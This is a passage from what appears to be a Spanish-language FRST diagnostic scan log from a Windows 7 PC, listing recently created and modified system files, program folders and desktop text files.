2020-03-25 14:27 - 2016-09-02 09:31 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2020-03-25 14:27 - 2016-09-02 09:31 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2020-03-25 14:27 - 2016-09-02 09:31 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2020-03-25 14:27 - 2016-09-02 09:31 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:02 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2020-03-25 14:27 - 2016-09-02 09:02 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2020-03-25 14:27 - 2016-09-02 09:01 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2020-03-25 14:27 - 2016-09-02 08:57 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2020-03-25 14:27 - 2016-09-02 08:53 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2020-03-25 14:27 - 2016-09-02 08:53 - 000050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2020-03-25 14:27 - 2016-09-02 08:53 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2020-03-25 14:27 - 2016-09-02 08:49 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2020-03-25 14:27 - 2016-09-02 08:49 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2020-03-25 14:27 - 2016-09-02 08:49 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2020-03-25 14:27 - 2016-09-02 08:49 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2020-03-25 14:27 - 2016-09-02 08:49 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2020-03-25 14:27 - 2016-09-02 08:48 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 08:48 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 08:48 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 08:48 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2020-03-25 14:27 - 2016-06-06 10:50 - 000228864 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2020-03-25 14:27 - 2016-06-06 10:50 - 000190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2020-03-25 14:27 - 2016-06-06 10:50 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2020-03-25 14:27 - 2016-06-06 09:23 - 000179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2020-03-25 14:27 - 2016-06-06 09:23 - 000145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2020-03-25 14:27 - 2016-06-06 09:23 - 000106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2020-03-25 14:27 - 2016-05-12 11:14 - 000084992 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2020-03-25 14:27 - 2016-05-12 09:18 - 000090624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\olepro32.dll
2020-03-25 14:27 - 2016-05-12 09:18 - 000067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2020-03-25 14:27 - 2016-05-04 11:17 - 000504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2020-03-25 14:27 - 2016-05-04 11:17 - 000337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2020-03-25 14:27 - 2016-05-04 11:17 - 000025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2020-03-25 14:27 - 2016-05-04 11:17 - 000025088 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2020-03-25 14:27 - 2016-05-04 11:16 - 000070144 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2020-03-25 14:27 - 2016-05-04 08:55 - 000073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
2020-03-25 14:27 - 2015-07-22 18:02 - 001390592 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2020-03-25 14:27 - 2015-07-22 18:02 - 000879104 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2020-03-25 14:27 - 2015-07-22 11:53 - 000635392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2020-03-25 14:27 - 2015-07-22 10:48 - 000041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2020-03-25 14:26 - 2016-03-16 12:50 - 000156672 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2020-03-25 14:26 - 2016-03-16 12:28 - 000176128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2020-03-25 14:26 - 2016-03-16 12:28 - 000111616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2020-03-25 14:26 - 2015-12-16 08:38 - 000419928 _____ C:\Windows\SysWOW64\locale.nls
2020-03-25 14:26 - 2015-12-16 08:37 - 000419928 _____ C:\Windows\system32\locale.nls
2020-03-25 14:26 - 2015-10-29 11:50 - 000342016 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2020-03-25 14:26 - 2015-10-29 11:50 - 000072192 _____ (Microsoft Corporation) C:\Windows\system32\aelupsvc.dll
2020-03-25 14:26 - 2015-10-29 11:50 - 000023552 _____ (Microsoft Corporation) C:\Windows\system32\sdbinst.exe
2020-03-25 14:26 - 2015-10-29 11:50 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\shimeng.dll
2020-03-25 14:26 - 2015-10-29 11:50 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shimeng.dll
2020-03-25 14:26 - 2015-10-29 11:49 - 000295936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apphelp.dll
2020-03-25 14:26 - 2015-10-29 11:49 - 000020992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sdbinst.exe
2020-03-25 14:26 - 2015-05-25 12:19 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\sechost.dll
2020-03-25 14:26 - 2015-05-25 12:18 - 000404992 _____ (Microsoft Corporation) C:\Windows\system32\tracerpt.exe
2020-03-25 14:26 - 2015-05-25 12:18 - 000104448 _____ (Microsoft Corporation) C:\Windows\system32\logman.exe
2020-03-25 14:26 - 2015-05-25 12:18 - 000047104 _____ (Microsoft Corporation) C:\Windows\system32\typeperf.exe
2020-03-25 14:26 - 2015-05-25 12:18 - 000043008 _____ (Microsoft Corporation) C:\Windows\system32\relog.exe
2020-03-25 14:26 - 2015-05-25 12:18 - 000019456 _____ (Microsoft Corporation) C:\Windows\system32\diskperf.exe
2020-03-25 14:26 - 2015-05-25 12:01 - 000092160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sechost.dll
2020-03-25 14:26 - 2015-05-25 12:00 - 000364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tracerpt.exe
2020-03-25 14:26 - 2015-05-25 12:00 - 000082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\logman.exe
2020-03-25 14:26 - 2015-05-25 12:00 - 000040448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\typeperf.exe
2020-03-25 14:26 - 2015-05-25 12:00 - 000037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\relog.exe
2020-03-25 14:26 - 2015-05-25 12:00 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\diskperf.exe
2020-03-25 14:25 - 2016-08-29 09:31 - 014183424 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2020-03-25 14:25 - 2016-08-29 09:31 - 001941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2020-03-25 14:25 - 2016-08-29 09:31 - 001867776 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2020-03-25 14:25 - 2016-08-29 09:12 - 012880384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2020-03-25 14:25 - 2016-08-29 09:12 - 001806848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2020-03-25 14:25 - 2016-08-29 09:12 - 001499648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2020-03-25 14:25 - 2016-08-29 09:04 - 003229696 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2020-03-25 14:25 - 2016-08-29 08:55 - 002972672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2020-03-25 14:25 - 2016-07-07 09:36 - 001896168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2020-03-25 14:25 - 2016-07-07 09:36 - 000377576 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2020-03-25 14:25 - 2016-07-07 09:36 - 000287976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2020-03-25 14:25 - 2016-07-07 09:08 - 000046080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpipreg.sys
2020-03-25 14:25 - 2016-07-01 09:31 - 000976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2020-03-25 14:25 - 2016-07-01 09:31 - 000084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2020-03-25 14:25 - 2016-07-01 09:13 - 000741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2020-03-25 14:25 - 2016-07-01 09:13 - 000084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2020-03-25 14:25 - 2016-07-01 08:56 - 000464896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2020-03-25 14:25 - 2016-07-01 08:56 - 000405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2020-03-25 14:25 - 2016-07-01 08:56 - 000168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2020-03-25 14:25 - 2016-03-09 13:00 - 000444416 _____ (Microsoft Corporation) C:\Windows\system32\winhttp.dll
2020-03-25 14:25 - 2016-03-09 13:00 - 000396800 _____ (Microsoft Corporation) C:\Windows\system32\webio.dll
2020-03-25 14:25 - 2016-03-09 12:40 - 000351744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winhttp.dll
2020-03-25 14:25 - 2016-03-09 12:40 - 000316416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webio.dll
2020-03-25 14:25 - 2016-01-20 18:51 - 000073664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\disk.sys
2020-03-25 14:25 - 2015-12-16 12:55 - 000069120 _____ (Microsoft Corporation) C:\Windows\system32\nlsbres.dll
2020-03-25 14:25 - 2015-12-16 12:53 - 000007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZEL.DLL
2020-03-25 14:25 - 2015-12-16 12:53 - 000007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZE.DLL
2020-03-25 14:25 - 2015-12-16 12:48 - 000007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZE.DLL
2020-03-25 14:25 - 2015-12-16 12:48 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kbdgeoqw.dll
2020-03-25 14:25 - 2015-12-16 12:48 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZEL.DLL
2020-03-25 14:25 - 2015-12-16 12:47 - 000069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlsbres.dll
2020-03-25 14:25 - 2015-07-09 11:58 - 001632256 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2020-03-25 14:25 - 2015-07-09 11:58 - 000082944 _____ (Microsoft Corporation) C:\Windows\system32\dwmapi.dll
2020-03-25 14:25 - 2015-07-09 11:42 - 001372160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2020-03-25 14:25 - 2015-07-09 11:42 - 000067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmapi.dll
2020-03-25 14:25 - 2015-04-10 21:19 - 000069888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\stream.sys
2020-03-25 14:06 - 2016-03-09 12:54 - 000275456 _____ (Microsoft Corporation) C:\Windows\system32\InkEd.dll
2020-03-25 14:06 - 2016-03-09 12:34 - 000216064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InkEd.dll
2020-03-23 18:49 - 2020-03-25 19:30 - 000013779 _____ C:\Users\MARCO AVILA\Desktop\Nuevo documento de texto.txt
2020-03-12 21:11 - 2020-03-15 15:07 - 000004410 _____ C:\Users\MARCO AVILA\Desktop\Nuevo documento de texto (5).txt

==================== Un mes (modificado) ==================

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2020-03-27 19:35 - 2009-07-13 22:45 - 000025840 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-03-27 19:35 - 2009-07-13 22:45 - 000025840 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-03-27 19:26 - 2019-09-26 13:33 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2020-03-27 19:25 - 2009-07-13 23:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-03-27 19:24 - 2009-10-28 12:18 - 000000000 ____D C:\ProgramData\Acer
2020-03-27 19:24 - 2009-10-28 12:18 - 000000000 ____D C:\Program Files\Acer
2020-03-27 19:24 - 2009-10-28 12:17 - 000000000 ____D C:\Program Files (x86)\Acer
2020-03-27 19:23 - 2017-11-28 20:52 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\IObit
2020-03-27 19:23 - 2017-10-19 11:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2020-03-27 19:23 - 2015-06-23 19:22 - 000000000 ____D C:\Users\MARCO AVILA\AppData\LocalLow\IObit
2020-03-27 19:23 - 2015-06-23 19:20 - 000000000 ____D C:\ProgramData\IObit
2020-03-27 19:07 - 2016-11-27 08:17 - 000000000 ____D C:\Users\MARCO AVILA\AppData\LocalLow\Mozilla
2020-03-27 19:04 - 2016-10-01 19:36 - 000002353 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2020-03-27 19:04 - 2013-05-07 17:40 - 000002226 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-03-27 19:04 - 2010-06-19 21:53 - 000001782 _____ C:\Users\Public\Desktop\Acer Accessorios.lnk
2020-03-27 19:04 - 2010-06-19 21:53 - 000001782 _____ C:\ProgramData\Desktop\Acer Accessorios.lnk
2020-03-27 19:04 - 2010-06-19 21:50 - 000001401 _____ C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2020-03-27 18:02 - 2009-07-13 21:20 - 000000000 ____D C:\Windows\inf
2020-03-27 18:00 - 2020-01-24 21:06 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\IDM
2020-03-27 17:59 - 2012-11-11 17:09 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\CrashDumps
2020-03-27 17:59 - 2011-07-03 21:22 - 000000000 ____D C:\Windows\Minidump
2020-03-27 16:02 - 2020-01-24 21:06 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\DMCache
2020-03-27 13:58 - 2019-02-16 20:05 - 000000000 ____D C:\Users\MARCO AVILA\Desktop\Nueva carpeta (2)
2020-03-26 20:31 - 2018-11-06 18:43 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-03-26 16:55 - 2019-08-06 10:58 - 000000000 ___HD C:\Users\MARCO AVILA\Desktop\_SNAPDOC
2020-03-26 16:38 - 2009-12-01 16:37 - 000903192 _____ C:\Windows\system32\perfh00A.dat
2020-03-26 16:38 - 2009-12-01 16:37 - 000214886 _____ C:\Windows\system32\perfc00A.dat
2020-03-26 16:38 - 2009-07-13 23:13 - 002098432 _____ C:\Windows\system32\PerfStringBackup.INI
2020-03-25 23:01 - 2019-08-21 16:35 - 000910336 ___SH C:\Users\MARCO AVILA\Desktop\Thumbs.db
2020-03-25 21:55 - 2016-03-17 00:20 - 000000000 ____D C:\Program Files\TAP-Windows
2020-03-25 20:36 - 2019-01-21 16:36 - 000005670 _____ C:\Users\MARCO AVILA\Desktop\Nuevo documento de texto (2).txt
2020-03-25 19:17 - 2016-10-23 11:39 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\SquirrelTemp
2020-03-25 19:13 - 2010-07-11 15:44 - 002045382 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2020-03-25 15:43 - 2010-10-16 20:06 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\ElevatedDiagnostics
2020-03-25 15:20 - 2009-07-13 22:45 - 000592696 _____ C:\Windows\system32\FNTCACHE.DAT
2020-03-25 14:41 - 2009-10-28 12:41 - 000000000 ____D C:\Windows\ShellNew
2020-03-25 14:41 - 2009-07-13 21:20 - 000000000 ____D C:\Windows\PolicyDefinitions
2020-03-25 00:40 - 2010-06-19 21:49 - 000000000 ____D C:\Users\MARCO AVILA
2020-03-25 00:38 - 2019-07-18 13:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2020-03-25 00:38 - 2018-11-06 17:05 - 000000000 ____D C:\Users\Administrador.MAAH-PC
2020-03-25 00:38 - 2017-12-03 12:49 - 000000000 ____D C:\Program Files\CCleaner
2020-03-25 00:37 - 2009-07-13 21:20 - 000000000 ____D C:\Windows\registration
2020-03-24 22:14 - 2011-12-31 01:46 - 000000000 ____D C:\Temp
2020-03-22 02:21 - 2010-09-01 20:43 - 000024576 _____ C:\Users\MARCO AVILA\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2020-03-21 01:10 - 2019-03-24 22:24 - 000000000 ____D C:\Users\MARCO AVILA\Desktop\Nueva carpeta (3)
2020-03-20 17:21 - 2013-05-07 17:33 - 000003536 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-03-20 17:21 - 2013-05-07 17:33 - 000003408 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2020-03-20 02:22 - 2009-12-01 07:55 - 000000000 ____D C:\ProgramData\Temp
